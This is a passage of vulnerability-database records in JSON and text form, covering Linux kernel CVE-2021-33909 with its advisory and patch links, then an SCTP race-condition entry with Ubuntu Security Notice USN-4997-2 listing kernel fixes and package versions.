        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "id": "VAR-202107-1361",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T19:28:07.610000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Amazon Linux AMI: ALAS-2021-1524",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1524"
      },
      {
        "title": "Debian Security Advisories: DSA-4941-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb9b5f5cc430f484f4420a11b7b87136"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-055",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-055"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-003",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-003"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1691",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1691"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-057",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-057"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-056",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-056"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-48] linux: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-48"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-50] linux-hardened: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-50"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-005",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-005"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-058"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-059",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-059"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-49] linux-zen: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-49"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-51] linux-lts: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-51"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-33909 log"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "LinuxVulnerabilities",
        "trust": 0.1,
        "url": "https://github.com/gitezri/linuxvulnerabilities "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/amiahuman/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/liang2580/cve-2021-33909 "
      },
      {
        "title": "cve-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/baerwolf/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/bbinfosec43/cve-2021-33909 "
      },
      {
        "title": "deep-directory",
        "trust": 0.1,
        "url": "https://github.com/sfowl/deep-directory "
      },
      {
        "title": "integer_compilation_flags",
        "trust": 0.1,
        "url": "https://github.com/mdulin2/integer_compilation_flags "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/alaial90/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/christhecoolhut/cve-2021-33909 "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/knewbury01/codeql-workshop-integer-conversion "
      },
      {
        "title": "kickstart-rhel8",
        "trust": 0.1,
        "url": "https://github.com/alexhaydock/kickstart-rhel8 "
      },
      {
        "title": "exploit_articles",
        "trust": 0.1,
        "url": "https://github.com/chokyuwon/exploit_articles "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/hardenedvault/ved "
      },
      {
        "title": "SVG-advisories",
        "trust": 0.1,
        "url": "https://github.com/egi-federation/svg-advisories "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/makoto56/penetration-suite-toolkit "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-190",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163621/sequoia-a-deep-root-in-linuxs-filesystem-layer.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/163671/kernel-live-patch-security-notice-lsn-0079-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/164155/kernel-live-patch-security-notice-lsn-0081-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://packetstormsecurity.com/files/165477/kernel-live-patch-security-notice-lsn-0083-1.html"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/07/22/7"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/08/25/10"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/2"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/17/4"
      },
      {
        "trust": 1.0,
        "url": "http://www.openwall.com/lists/oss-security/2021/09/21/1"
      },
      {
        "trust": 1.0,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.4"
      },
      {
        "trust": 1.0,
        "url": "https://github.com/torvalds/linux/commit/8cae8cd89f05f6de223d63e6d15e31c8ba9cf53b"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00014.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00015.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.debian.org/debian-lts-announce/2021/07/msg00016.html"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z4uhhigiso3fvrf4cqnjs4ika25atsfu/"
      },
      {
        "trust": 1.0,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2022-0015"
      },
      {
        "trust": 1.0,
        "url": "https://security.netapp.com/advisory/ntap-20210819-0004/"
      },
      {
        "trust": 1.0,
        "url": "https://www.debian.org/security/2021/dsa-4941"
      },
      {
        "trust": 1.0,
        "url": "https://www.openwall.com/lists/oss-security/2021/07/20/1"
      },
      {
        "trust": 1.0,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-006"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-33034"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2723"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5014-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1014.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-25.27"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1045.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1042.44"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-76.72"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1014.15"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2731"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2728"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2725"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2737"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2734"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33910"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2763"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25737"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26540"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-26539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29059"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23368"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2438"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15112"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23337"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25735"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2437"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28852"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21623"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15106"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-29622"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20291"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28500"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15113"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27292"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3114"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15114"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3636"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-07-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2021-07-21T16:03:37",
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "date": "2021-07-21T16:04:17",
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "date": "2021-07-21T16:04:59",
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "date": "2021-07-21T16:05:35",
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "date": "2021-07-21T16:06:02",
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "date": "2021-07-21T16:07:24",
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "date": "2021-07-20T20:34:00",
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "date": "2021-07-27T14:47:55",
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "date": "2021-07-28T14:53:49",
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "date": "2021-09-14T16:28:49",
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "date": "2021-07-20T19:15:09.747000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "date": "2023-11-07T03:35:56.050000",
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2021-2723-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163590"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163595"
      }
    ],
    "trust": 0.1
  }
}

var-202104-1571
Vulnerability from variot

A race condition in Linux kernel SCTP sockets (net/sctp/socket.c) before 5.12-rc8 can lead to kernel privilege escalation from the context of a network service or an unprivileged process. If sctp_destroy_sock is called without sock_net(sk)->sctp.addr_wq_lock then an element is removed from the auto_asconf_splist list without any proper locking. This can be exploited by an attacker with network service privileges to escalate to root or from the context of an unprivileged user directly if a BPF_CGROUP_INET_SOCK_CREATE is attached which denies creation of some SCTP socket. ========================================================================== Ubuntu Security Notice USN-4997-2 June 25, 2021

linux-kvm vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 21.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-kvm: Linux kernel for cloud environments

Details:

USN-4997-1 fixed vulnerabilities in the Linux kernel for Ubuntu 21.04. This update provides the corresponding updates for the Linux KVM kernel for Ubuntu 21.04. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly enforce limits for pointer operations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33200)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly clear received fragments from memory in some situations. A physically proximate attacker could possibly use this issue to inject packets or expose sensitive information. (CVE-2020-24586)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled encrypted fragments. A physically proximate attacker could possibly use this issue to decrypt fragments. (CVE-2020-24587)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled certain malformed frames. If a user were tricked into connecting to a malicious server, a physically proximate attacker could use this issue to inject packets. (CVE-2020-24588)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation incorrectly handled EAPOL frames from unauthenticated senders. A physically proximate attacker could inject malicious packets to cause a denial of service (system crash). (CVE-2020-26139)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation did not properly verify certain fragmented frames. A physically proximate attacker could possibly use this issue to inject or decrypt packets. (CVE-2020-26141)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation accepted plaintext fragments in certain situations. A physically proximate attacker could use this issue to inject packets. (CVE-2020-26145)

Mathy Vanhoef discovered that the Linux kernel’s WiFi implementation could reassemble mixed encrypted and plaintext fragments. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23133)

Or Cohen and Nadav Markus discovered a use-after-free vulnerability in the nfc implementation in the Linux kernel. A privileged local attacker could use this issue to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-23134)

Manfred Paul discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel contained an out-of-bounds vulnerability. A local attacker could use this issue to execute arbitrary code. (CVE-2021-31440)

Piotr Krysiuk discovered that the eBPF implementation in the Linux kernel did not properly prevent speculative loads in certain situations. A local attacker could use this to expose sensitive information (kernel memory). An attacker could use this issue to possibly execute arbitrary code. (CVE-2021-32399)

It was discovered that a use-after-free existed in the Bluetooth HCI driver of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)

It was discovered that an out-of-bounds (OOB) memory access flaw existed in the f2fs module of the Linux kernel. A local attacker could use this issue to cause a denial of service (system crash). (CVE-2021-3506)

Mathias Krause discovered that a null pointer dereference existed in the Nitro Enclaves kernel driver of the Linux kernel. A local attacker could use this issue to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3543)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 21.04: linux-image-5.11.0-1009-kvm 5.11.0-1009.9 linux-image-kvm 5.11.0.1009.9

After a standard system update you need to reboot your computer to make all the necessary changes.

